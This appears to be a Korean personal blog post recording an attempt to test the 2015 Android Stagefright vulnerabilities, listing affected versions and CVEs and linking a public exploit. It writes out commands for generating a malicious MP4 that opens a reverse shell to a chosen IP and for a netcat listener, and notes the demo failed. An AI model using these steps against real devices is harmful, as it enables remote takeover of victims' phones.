Android 미디어 파일을 처리하는 Stagefright에서 다수의 정수 오버플로우 취약점이 발견되어 해커가 조작된 미디어 파일을 MMS를 이용하여 피해자로 전송할 경우 사용자의 인지 없이 원격 코드 실행 및 권한상승이 가능하다.

영향 받는 버전

안드로이드 2.2(Froyo) ~ 5.1.1_r5(Lollipop)


Common Vulnerabilities and Exposures (CVE) 번호

CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828

테스트

https://www.exploit-db.com/exploits/38124/

exploit code를 실행하면 수많은 에러 메세지가 발생한다. Linux에서 Windows로 포팅하는 작업이 필요하다.

# 특수 문자 치환
〃  ->  "
〃'''' ->  """
―  ->  -










 # 불필요한 문구 삭제
- See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purpose/#sthash.MbvoiMxd.dpuf



# mp4.py로 파일명 변환



# 옵션 특수문자 치환 ―  ->  -




# 실행


> python mp4.py -c [리버스커넥션을 연결한 서버 IP] [Port]





# 리버스커넥션 열기
> nc.exe -l -p [Port]


# Genymotion에서 시연 실패


-_-??

참고자료

- http://www.zdnet.com/article/check-your-android-device-for-the-stagefright-vulnerability/
- http://www.techrepublic.com/article/how-to-scan-your-device-for-the-stagefright-vulnerability/
- http://thehackernews.com/2015/09/stagefright-android-exploit-code.html
- http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
- https://en.wikipedia.org/wiki/Stagefright_(bug)



저작자 표시 비영리 동일 조건 변경 허락
신고
1 2 3 4 5 6 7 8 9 ··· 121 

카운터

Total : 85,369 / Today : 1 / Yesterday : 31
get rsstistory!